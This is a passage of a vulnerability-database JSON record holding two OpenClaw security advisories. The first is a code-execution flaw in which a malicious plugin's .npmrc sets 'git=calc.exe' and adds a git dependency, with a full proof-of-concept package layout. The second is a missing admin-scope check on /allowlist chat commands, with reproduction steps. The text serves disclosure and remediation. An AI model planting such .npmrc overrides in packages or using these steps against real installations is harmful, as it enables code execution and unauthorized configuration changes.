directory, local plugin archive, local hook pack directory, or local hook pack archive, OpenClaw first copies the source directory to a temporary `stageDir`, then executes the following in that directory:\n\n```\nnpm install --omit=dev --silent --ignore-scripts\n```\n\nSee `src/infra/install-package-dir.ts:176-199`.\n\nSince this process does not strip the project root `.npmrc`, and npm reads the project-level `.npmrc` during local project installation, an attacker could use a `.npmrc` file in a malicious plugin or hook directory to override npm’s `git` executable path. By leveraging a Git dependency, the attacker could trigger npm to call this malicious program, thereby executing arbitrary local code during the installation phase.\n\n**Affected Paths**\n\n- Plugin CLI entry point: `src/cli/plugins-cli.ts:199-255`\n- Hook CLI entry point: `src/cli/hooks-cli.ts:573-676`\n- Plugin local directory / archive installation: `src/plugins/install.ts:379-405`, `src/plugins/install.ts:541-565`\n- Hook local directory / archive installation: `src/hooks/install.ts:380-403`, `src/hooks/install.ts:443-470`\n- Actual execution of `npm install --ignore-scripts`: `src/infra/install-package-dir.ts:176-199`\n\n**Vulnerability Trigger Flow**\n\n1. The user executes one of the following commands:\n\n   - `openclaw plugins install <path-or-spec>`\n   - `openclaw hooks install <path-or-spec>`\n2. If the argument is a local directory or local archive, OpenClaw navigates to the local installation path.\n3. OpenClaw copies the source directory to a temporary `stageDir`. See `src/infra/install-package-dir.ts:176-177`.\n4. If `dependencies` are present in `package.json`, OpenClaw executes the following in `stageDir`:\n\n```\nnpm install --omit=dev --silent --ignore-scripts\n```\n\nSee `src/infra/install-package-dir.ts:188-199`.\n\n5. npm reads the project-level `.npmrc` file in this directory.  Official documentation: [`.npmrc`](https://docs.npmjs.com/cli/v11/configuring-npm/npmrc/)\n6. 
If `.npmrc` is set to `git=<path to malicious program>` and there is a git dependency in the dependency tree, npm will invoke that `git` program when resolving the dependency.  Official documentation: [`npm config git`](https://docs.npmjs.com/cli/v11/using-npm/config/)  Git dependency documentation: [`package.json`](https://docs.npmjs.com/cli/v11/configuring-npm/package-json/)\n7. Consequently, an attacker can execute arbitrary local programs during the plugin/hook installation phase without waiting for the plugin or hook to be loaded later.\n\n**Triggering Commands**\n\n- Plugin installation command:\n\n```\nopenclaw plugins install <path-or-spec>\n```\n\n- Hook installation command:\n\n```\nopenclaw hooks install <path-or-spec>\n```\n\nWhen `<path-or-spec>` is a local directory or local archive, it will be resolved to the path used by the `npm install --omit=dev --silent --ignore-scripts` command mentioned above.\n\n### PoC\n\n\n\nCurrently, `testpoc/` is a minimal PoC directory used to verify that “when installing local packages, OpenClaw enters the `npm install --ignore-scripts` path.” It is divided into two core sections:\n\ntestpoc/pkg/\nPurpose: Simulates the local package directory installed by `openclaw plugins install ...` or `openclaw hooks install ...`\ntestpoc/repo/\nPurpose: Simulates a Git dependency repository within the npm dependency tree\nDirectory Structure\n\ntestpoc/\n├─ pkg/\n│  ├─ .npmrc\n│  ├─ package.json\n│  └─ sample-hook/\n│     ├─ HOOK.md\n│     └─ handler.js\n└─ repo/\n   ├─ package.json\n   └─ .git/...\nFunction of Each Component\n\ntestpoc/pkg/.npmrc\n\nCurrent content:\ngit=calc.exe\nFunction: Overrides npm’s Git executable configuration.\nMeaning: When npm encounters a git dependency during installation, it will not call the system git but will attempt to call the program specified here.\nThis is the core trigger point of this PoC. 
See testpoc/pkg/.npmrc:1\ntestpoc/pkg/package.json\n\nCurrently, this is a “mixed-use” manifest that includes both plugin and hook fields:\n{\n  “name”: “probe-host”,\n  “version”: “1.0.0”,\n  “private”: true,\n  “openclaw”: {\n    “extensions”: [“./dist/index.js”],\n    “hooks”: [“./sample-hook”]\n  },\n  “dependencies”: {\n    “probe-git-dep”: “git+file:///D:/AI Agent Source/OpenClaw/openclaw-2026.3.13-1/.testpoc/repo”\n  }\n}\nThe manifest serves three purposes:\nopenclaw.extensions: Allows it to be validated as a plugin package\nopenclaw.hooks: Enables it to be validated as a hook package\nThe Git URL in dependencies: Forces npm to enter the Git dependency resolution path during installation\nSee testpoc/pkg/package.json:1\ntestpoc/pkg/sample-hook/HOOK.md\n\nPurpose: To meet the minimum metadata requirements for a hook package.\nThis is the key file that allows `openclaw hooks install pkg` to pass the pre-check. See testpoc/pkg/sample-hook/HOOK.md:1\ntestpoc/pkg/sample-hook/handler.js\n\nCurrent content:\nexport default async function handler() {\n  return { ok: true };\n}\nPurpose: Meets the requirement that the hook directory must contain a handler entry file.\nIt plays no part in the exploit itself; its sole purpose is to allow OpenClaw to proceed to the dependency installation phase. See testpoc/pkg/sample-hook/handler.js:1\ntestpoc/repo/package.json\n\nCurrent content:\n{“name”:“probe-git-dep”,“version”:“1.0.0”}\nPurpose: Serves as the minimum repository content corresponding to a Git dependency.\nThe focus is not on the repository code itself, but on the fact that “it is a Git repository,” allowing npm to perform Git-related operations on it. See testpoc/repo/package.json:1\ntestpoc/repo/.git/\n\nPurpose: Makes testpoc/repo/ a real Git repository rather than a regular directory.\nWhen npm resolves git+file://... 
dependencies during installation, this directory is treated as the Git source.\nHow the current PoC works\n\nIf installing via hooks:\n\nopenclaw hooks install testpoc/pkg\nThe trigger chain is:\n\nOpenClaw identifies testpoc/pkg as the local hook package path\nPasses pre-validation of openclaw.hooks, HOOK.md, and handler.js\nProceeds to src/infra/install-package-dir.ts:188-199\nExecutes:\nnpm install --omit=dev --silent --ignore-scripts\nnpm reads testpoc/pkg/.npmrc\nnpm processes the git dependency in package.json\nnpm attempts to call the program specified by git=calc.exe in .npmrc\n\n### Impact\nIt is best described as an installation-time local command execution / unsafe package-install configuration issue.\n\nMore precisely:\n\nOpenClaw installs local plugin and hook packs by running npm install --omit=dev --silent --ignore-scripts inside the staged package directory, see src/infra/install-package-dir.ts:188-199.\nIf that local package directory contains an attacker-controlled .npmrc, npm will still read it.\nIf .npmrc overrides npm’s git executable and the package has a git dependency, npm can invoke the attacker-chosen program during install.\n\nWho is impacted\n\nUsers who run:\n\nopenclaw plugins install <local path/archive>\nopenclaw hooks install <local path/archive>\n\nAnd who install a malicious or untrusted local package that includes:\n\na controlled .npmrc\na git dependency\na runnable attacker-controlled git target on that platform\n\nThis should be treated as a security issue, not just “malicious plugin behavior,” because the code execution happens during OpenClaw’s install workflow, before the plugin or hook is ever loaded as trusted runtime code.\n\nThe important distinction is:\n\nA normal “trusted plugin” case is: the operator installs a plugin, enables it, and later that plugin runs with plugin privileges.\nThis issue is different: OpenClaw’s installer executes npm install --omit=dev --silent --ignore-scripts inside an attacker-controlled package directory, and npm 
still honors attacker-controlled project config from .npmrc.\n\nThat means an untrusted local plugin or hook package can influence the package manager itself and reach arbitrary program execution at install time, via npm’s git setting and a git dependency, even though --ignore-scripts is present.\n\nWhy this matters from a security perspective:\n\nIt is install-time execution, not post-install trusted execution.\n\nThe execution is triggered by OpenClaw’s installer in src/infra/install-package-dir.ts:188-199.\n\nThis occurs before the package is accepted as a trusted loaded plugin/hook in the usual sense.\n\nIt defeats an expected safety boundary.\n\nThe code explicitly uses --ignore-scripts, which strongly suggests an intent to make installation safer.\n\nBut the installer still allows attacker-controlled package-manager configuration from .npmrc to affect execution.\n\nSo the current mitigation is incomplete in a security-relevant way.\n\nThe dangerous input is part of a supported user flow.\n\nOpenClaw explicitly supports installing plugins and hook packs from local directories and archives:\n\nsrc/cli/plugins-cli.ts:199-255\nsrc/cli/hooks-cli.ts:573-676\n\nThat makes “download a package/archive, then install it” a realistic operator action, not an artificial lab setup.\n\nThe issue is broader than plugin trust.\n\nThe problem is not “plugins can do bad things once trusted.”\n\nThe problem is “the installer consumes attacker-controlled package-manager config before trust is established.”\n\nThat is much closer to an unsafe install / supply-chain execution flaw than to ordinary trusted-plugin behavior.\n\nHooks are affected too.\n\nThe same installer path is used for hook packs, not only plugins.\n\nSo this is a shared install-surface issue, not an isolated plugin-runtime 
concern.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35641","reference_id":"","reference_type":"","scores":[{"value":"0.0001","scoring_system":"epss","scoring_elements":"0.0119","published_at":"2026-06-07T12:55:00Z"},{"value":"0.0001","scoring_system":"epss","scoring_elements":"0.01189","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35641"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"8.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-m3mh-3mpg-37hw","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-14T14:30:45Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-m3mh-3mpg-37hw"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35641","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"8.4","scoring_system":"cvssv4","
scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35641"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-code-execution-via-npmrc-in-local-plugin-hook-installation","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"8.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-14T14:30:45Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-code-execution-via-npmrc-in-local-plugin-hook-installation"},{"reference_url":"https://github.com/advisories/GHSA-m3mh-3mpg-37hw","reference_id":"GHSA-m3mh-3mpg-37hw","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-m3mh-3mpg-37hw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110567?format=json","purl":"pkg:npm/openclaw@2026.3.24","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulne
rability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5dj5-mk23-kyds"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-66nc-bn98-nbas"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulne
rability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-acy1-83py-efhr"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulne
rability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-utv2-tyje-kfht"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulne
rability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vv2u-u7mn-rfe1"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24"}],"aliases":["CVE-2026-35641","GHSA-m3mh
-3mpg-37hw"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-brfj-4shr-qkgc"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91829?format=json","vulnerability_id":"VCID-bumq-54sb-6ua7","summary":"OpenClaw: Mutating internal `/allowlist` chat commands missed `operator.admin` scope enforcement\n> Fixed in OpenClaw 2026.3.24, the current shipping release.\n\n**Title**  \nMutating internal `/allowlist` chat commands missed `operator.admin` scope enforcement\n\n**CWE**  \nCWE-862 Missing Authorization\n\n**CVSS v3.1**  \nCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N  \nBase score: **6.5 (Medium)**\n\n**Severity Assessment**  \nMedium. This is a real authorization flaw in OpenClaw’s internal control plane. The issue does not require host access, trusted local state tampering, or multi-tenant assumptions, but exploitation does require an already authenticated internal Gateway caller with `operator.write`.\n\n**Impact**  \nAn authenticated internal Gateway caller limited to `operator.write` can perform state-changing `/allowlist` actions without `operator.admin`, even though comparable mutating internal chat commands already require `operator.admin`. The reachable effects are persistent changes to config-backed `allowFrom` entries and pairing-store-backed allowlist entries.\n\nThis is not a semantic-modeling complaint and not a generic “trusted operator can do things” claim. 
It is a missing authorization check inside OpenClaw’s own internal scope model, where peer mutating command surfaces already distinguish `operator.write` from `operator.admin`.\n\n**Affected Component**  \nVerified against the latest published GitHub release tag `v2026.3.23` (`ccfeecb6887cd97937e33a71877ad512741e82b2`), published `2026-03-23T23:15:50Z`.\n\nExact vulnerable path on the shipped tag:\n- `src/auto-reply/reply/commands-allowlist.ts:251-254`\n  - `/allowlist` authorization uses only `rejectUnauthorizedCommand(...)`.\n- `src/auto-reply/reply/commands-allowlist.ts:386-524`\n  - mutating config and pairing-store writes happen here, but there is no `requireGatewayClientScopeForInternalChannel(..., operator.admin, ...)`.\n\nReachability and scope model:\n- `src/gateway/method-scopes.ts:94-109`\n  - `chat.send` is a write-scoped method.\n- `src/gateway/server.chat.gateway-server-chat.test.ts:539-559`\n  - existing runtime coverage proves `chat.send` routes slash commands without an agent run.\n- `src/auto-reply/command-auth.ts:574-577`\n  - internal callers become `senderIsOwner` only when `GatewayClientScopes` includes `operator.admin`.\n\nComparable internal mutating command paths already enforce `operator.admin`:\n- `src/auto-reply/reply/commands-config.ts:64-73`\n- `src/auto-reply/reply/commands-mcp.ts:89-96`\n- `src/auto-reply/reply/commands-plugins.ts:387-394`\n- `src/auto-reply/reply/commands-acp.ts:98-106`\n\nVersion history:\n- Introduced by commit `555b2578a8cc6e1b93f717496935ead97bfbed8b` (`feat: add /allowlist command`)\n- Earliest released affected tag found: `v2026.1.20`\n- Latest released affected tag verified: `v2026.3.23`\n\n**Technical Reproduction**  \n1. Check out the shipped release tag `v2026.3.23`.\n2. Use an internal command context with:\n   - `Provider = \"webchat\"`\n   - `Surface = \"webchat\"`\n   - `GatewayClientScopes = [\"operator.write\"]`\n   - `params.command.channel = \"webchat\"`\n3. 
Route a slash command through `chat.send`.\n4. Execute either of these mutating commands:\n   - `/allowlist add dm channel=telegram 789`\n   - `/allowlist add dm --store channel=telegram 789`\n5. Confirm the command context is authorized but not owner-equivalent:\n   - `isAuthorizedSender === true`\n   - `senderIsOwner === false`\n6. Observe that the commands still succeed and perform persistent writes.\n\n**Demonstrated Impact**  \nThe vulnerable handler performs real state mutation for a low-scope internal caller:\n- Config-backed mutation path:\n  - `src/auto-reply/reply/commands-allowlist.ts:398-503`\n  - reads the config snapshot, applies the edit, validates, and writes the updated config to disk.\n- Store-backed mutation path:\n  - `src/auto-reply/reply/commands-allowlist.ts:479-485`\n  - `src/auto-reply/reply/commands-allowlist.ts:513-518`\n  - updates the pairing-store allowlist without any admin-scope gate.\n\nThe result is successful persistence, not just a misleading success message.\n\n**Environment**  \n- Product: OpenClaw\n- Verified shipped tag: `v2026.3.23`\n- Shipped tag commit: `ccfeecb6887cd97937e33a71877ad512741e82b2`\n- Published GitHub release time: `2026-03-23T23:15:50Z`\n- Verification date: `2026-03-24`\n\n**Duplicate Check**  \nThis is not a duplicate of:\n- `GHSA-pjvx-rx66-r3fg`\n  - that advisory covered cross-account scoping in `/allowlist ... 
--store`, not missing internal `operator.admin` enforcement.\n- `GHSA-hfpr-jhpq-x4rm`\n  - that advisory covered `/config` writes through `chat.send`, not `/allowlist`.\n- `GHSA-3w6x-gv34-mqpf`\n  - same authorization class, but different command path (`/acp`, not `/allowlist`).\n\n**In Scope Check**  \nThis report is in scope under `SECURITY.md` because:\n- it does **not** rely on adversarial operators sharing one gateway host or config;\n- it does **not** target the HTTP compatibility endpoints that `SECURITY.md` explicitly treats as full operator-access surfaces;\n- it demonstrates a real authorization mismatch inside OpenClaw’s own internal control-plane scope model (`operator.write` vs `operator.admin`);\n- peer mutating internal chat commands already enforce `operator.admin`, so this is not a request for a new boundary but a missing check on an existing one.\n\nThis is therefore a concrete authorization bug, not a trusted-operator hardening suggestion.\n\n**Remediation Advice**  \n1. Add `requireGatewayClientScopeForInternalChannel(..., allowedScopes: [\"operator.admin\"], ...)` to the mutating internal `/allowlist` paths.\n2. Add regression coverage for both mutation modes:\n   - internal `operator.write` must be rejected;\n   - internal `operator.admin` must be allowed.\n3. Cover both config-backed and store-backed writes.\n4. 
Audit other mutating internal chat-command paths for the same missing-scope pattern.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vqvg-86cc-cg83","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vqvg-86cc-cg83"},{"reference_url":"https://github.com/advisories/GHSA-vqvg-86cc-cg83","reference_id":"GHSA-vqvg-86cc-cg83","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https:/